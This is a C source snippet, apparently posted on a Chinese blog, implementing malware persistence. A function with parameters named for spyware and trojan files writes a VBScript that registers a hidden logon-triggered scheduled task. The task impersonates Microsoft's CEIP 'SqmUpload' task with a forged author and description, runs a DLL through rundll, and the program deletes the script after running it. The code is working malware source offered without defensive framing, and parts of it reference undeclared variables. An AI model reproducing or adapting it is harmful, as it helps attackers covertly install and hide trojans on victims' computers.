const char *szDataA[]= {
"on error resume next\r\n"
"Err.clear\r\n"
"const TriggerTypeLogon = 9\r\n"
"const ActionTypeExecutable = 0\r\n"
"const TASK_INSTANCES_IGNORE_NEW = 2\r\n"
"const createOrUpdateTask = 6\r\n"
"const TASK_LOGON_INTERACTIVE_TOKEN = 3\r\n"
"Set service = CreateObject(\"Schedule.Service\")\r\n"
"call service.Connect()\r\n"
"Dim rootFolder\r\n"
"Set rootFolder = service.GetFolder(\"\\\")\r\n"
"rootFolder.CreateFolder(\"\\WPD\")\r\n"
"Set rootFolder = service.GetFolder(\"\\WPD\")\r\n"
"Dim taskDefinition\r\n"
"Set taskDefinition = service.NewTask(0)\r\n"
"Dim regInfo\r\n"
"Set regInfo = taskDefinition.RegistrationInfo\r\n"
"regInfo.Description = \"This task uploads Customer Experience Improvement Program (CEIP) data for Portable Devices.\"\r\n"
"regInfo.Author = \"Microsoft Corporation\"\r\n"
"Dim settings\r\n"
"Set settings = taskDefinition.Settings\r\n"
"settings.StartWhenAvailable = True\r\n"
"settings.ExecutionTimeLimit = \"P9999D\"\r\n"
"settings.DisallowStartIfOnBatteries = False\r\n"
"settings.StopIfGoingOnBatteries = False\r\n"
"settings.IdleSettings.StopOnIdleEnd = False\r\n"
"settings.MultipleInstances = TASK_INSTANCES_IGNORE_NEW\r\n"
"Dim triggers\r\n"
"Set triggers = taskDefinition.Triggers\r\n"
"Dim trigger\r\n"
"Set trigger = triggers.Create(TriggerTypeLogon)\r\n"
"Dim startTime, endTime\r\n"
"startTime = \"2007-01-01T00:00:00\"\r\n"
"endTime = \"2059-12-31T23:59:59\"\r\n"
"trigger.StartBoundary = startTime\r\n"
"trigger.Id = \"RundllAutoStart\"\r\n"
};
const char szDataB[]=
"trigger.UserId = \"%s\"\r\n"
"trigger.ExecutionTimeLimit = \"\"\r\n"
"Dim Action\r\n"
"Set Action = taskDefinition.Actions.Create( ActionTypeExecutable )\r\n"
"Action.Path = \"%s\"\r\n"
"Action.Arguments = \"%s, DF7CD2SCRT\"\r\n"
"Dim princ\r\n"
"Set princ = taskDefinition.Principal\r\n"
"princ.UserId = trigger.UserId\r\n"
"princ.LogonType = TASK_LOGON_INTERACTIVE_TOKEN\r\n"
"call rootFolder.RegisterTaskDefinition( _\r\n"
" \"SqmUpload_S-1-5-21-901245272-4294329958-%s-1000\", taskDefinition, createOrUpdateTask, _\r\n"
" trigger.UserId, , 3)\r\n";
BOOL Task_scheduler(LPSTR szSpywareName,LPSTR szFileName,LPSTR szTrojanName){
STARTUPINFO si;
PROCESS_INFORMATION pi;
char szArg[MAX_PATH] = {0};
char UserName[40],szBuffer[1024];
ZeroMemory(&si, sizeof(si));
ZeroMemory(&pi, sizeof(pi));
GetUserName(UserName, &_buffer);
GetLocalTime(&st);
wsprintf(h, (st.wHour < 10) ? "0%d":"%d", st.wHour);
wsprintf(m, (st.wMinute < 10) ? "0%d":"%d", st.wMinute);
wsprintf(s, (st.wSecond < 10) ? "0%d":"%d", st.wSecond);
wsprintf(Y,"%d", st.wYear);
wsprintf(M, (st.wMonth < 10) ? "0%d":"%d", st.wMonth);
wsprintf(D, (st.wDay < 10) ? "0%d":"%d", st.wDay);
wsprintf(szTime,"%s%s%s%s%s%s",Y,M,D,h,m,s);
HANDLE hFile = CreateFile(szSpywareName, (GENERIC_READ | GENERIC_WRITE), 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
SetFilePointer(hFile, NULL, NULL, FILE_END);
WriteFile(hFile , szDataA[0], strlen(szDataA[0]), &dwWritten, NULL);
CloseHandle(hFile);
hFile = CreateFile(szSpywareName, (GENERIC_READ | GENERIC_WRITE), 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
SetFilePointer(hFile, NULL, NULL, FILE_END);
wsprintf(szBuffer,szDataB,UserName,szFileName,szTrojanName,szTime);
WriteFile(hFile, szBuffer, strlen(szBuffer), &dwWritten, NULL);
CloseHandle(hFile);
if (PathFileExists(szSpywareName)){
wsprintf(szArg,"%s %s","wscript.exe",szSpywareName);
if ( !CreateProcess(NULL,szArg,NULL,NULL,false,CREATE_NO_WINDOW, NULL,NULL, &si, &pi) ){
OutputDebugStringA("CreateProcess failed!");
return false;
}
else{
WaitForSingleObject(pi.hProcess,INFINITE);
CloseHandle(pi.hProcess);
remove(szSpywareName);
return true;
}
}
return TRUE;
}
扫一扫
06-01
1009
1009
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
